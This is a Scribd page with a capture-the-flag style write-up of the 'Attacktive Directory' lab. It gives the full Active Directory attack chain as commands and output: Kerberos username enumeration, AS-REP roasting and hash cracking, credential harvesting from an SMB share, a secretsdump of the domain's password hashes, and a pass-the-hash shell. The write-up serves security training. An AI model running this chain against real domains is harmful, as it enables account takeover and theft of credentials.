Scribd
Upload
3 views

Document

The document outlines a penetration testing setup for an Active Directory environment, detailing the installation of tools like Impacket, Bloodhound, and EvilWinRM. It includes steps for enumeration using Nmap and Kerbrute, revealing valid usernames and methods for exploiting Kerberos vulnerabilities. The document concludes with successful credential extraction and access to the system using the Evil-WinRM tool.

Uploaded by

popliobli
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
3 views

Document

The document outlines a penetration testing setup for an Active Directory environment, detailing the installation of tools like Impacket, Bloodhound, and EvilWinRM. It includes steps for enumeration using Nmap and Kerbrute, revealing valid usernames and methods for exploiting Kerberos vulnerabilities. The document concludes with successful credential extraction and access to the system using the Evil-WinRM tool.

Uploaded by

popliobli
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Attacktive Directory

export IP=10.10.192.109

Setup
Impacket requires python version >=3.7.
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install
Bloodhound Neo4j
sudo apt install bloodhound neo4j
Kerbrute: brute force discovery of users, passwords and even password spray!
https://github.com/ropnop/kerbrute/releases
EvilWinRM
https://github.com/Hackplayers/evil-winrm

Enum
nmap
root@ip-10-10-47-56:~/AttacktiveDir# nmap -sC -sV 10.10.192.109 -oN nmap.initial

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-25 17:09 BST


Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.83% done; ETC: 17:10 (0:00:15 remaining)
Nmap scan report for ip-10-10-192-109.eu-west-1.compute.internal (10.10.192.109)
Host is up (0.00041s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 16:10:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
445/tcp open microsoft-ds?

1
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-06-24T16:06:44
|_Not valid after: 2023-12-24T16:06:44
|_ssl-date: 2023-06-25T16:10:46+00:00; 0s from scanner time.
MAC Address: 02:52:FA:48:EB:61 (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:fa:48:e
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25 17:10:46
|_ start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/


Nmap done: 1 IP address (1 host up) scanned in 105.10 seconds
enum4linux
enum4linux 10.10.192.109

Abusing Kerberos
kerbrute
User list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-
tools/master/userlist.txt Password list: https://raw.githubusercontent.com/Sq00ky/attacktive-
directory-tools/master/passwordlist.txt > User and pass list is this room specific
normally brute force not recommended cuz of account lockout.
root@ip-10-10-47-56:~/AttacktiveDir# ./kerbrute_linux_amd64 userenum --dc 10.10.192.109 -d s

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/25/23 - Ronnie Flathers @ropnop

2
2023/06/25 17:39:47 > Using KDC(s):
2023/06/25 17:39:47 > 10.10.192.109:88

2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]


2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:48 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:49 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:50 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:51 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:55 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:57 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:05 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:09 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:10 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:16 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:20 > Done! Tested 73317 usernames (16 valid) in 33.641 seconds
We can attack with ASReproasting > ASReproasting occurs when a user
account has the privilege “Does not require Pre-Authentication” set. This means
that the account does not need to provide valid identification before requesting
a Kerberos Ticket on the specified user account.

Retrieving Kerberos Tickets GetNPUsers.py (located in impacket/examples/GetNPUsers.py)


> that will allow us to query ASReproastable accounts from the Key Dis-
tribution Center. > that’s necessary to query accounts is a valid set of
usernames
root@ip-10-10-47-56:~/AttacktiveDir# python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for svc-admin


[email protected]:5da54054107c7568f46b52473942dfa3$8c860941f70266326ca
We got ticket without pass.
hashcat
hashcat -m 18200 hash.txt passwordlist.txt

pass: management2005
-m 18200 Kerberos 5 AS-REP etype 23
smbclient

3
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin -L 10.10.192.109
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:

Sharename Type Comment


--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.192.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
smbclient
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin \\\\10.10.192.109\\backup
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020

8247551 blocks of size 4096. 3610988 blocks available

root@ip-10-10-47-56:~/AttacktiveDir# cat backup_credentials.txt


YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

root@ip-10-10-47-56:~/AttacktiveDir# base64 -d backup_credentials.txt


[email protected]:backup2517860
We got backup pass.
Well, it is the backup account for the Domain Controller. This account has
a unique permission that allows all Active Directory changes to be synced
with this user account. This includes password hashes
Secretsdump
root@ip-10-10-47-56:~/AttacktiveDir# secretsdump.py -just-dc [email protected]

Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

4
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d709
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a64
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cf
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab4553
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:6ccefc4d4705491321ca8a24d7fd8ee5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
.
.
.
Administrators NTLM: 0e0363213e37b94221497260b0bcb4fc

Pass the Hash


root@ip-10-10-47-56:~/AttacktiveDir# evil-winrm -i 10.10.192.109 -u Administrator -H 0e03632

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami


thm-ad\administrator

You might also like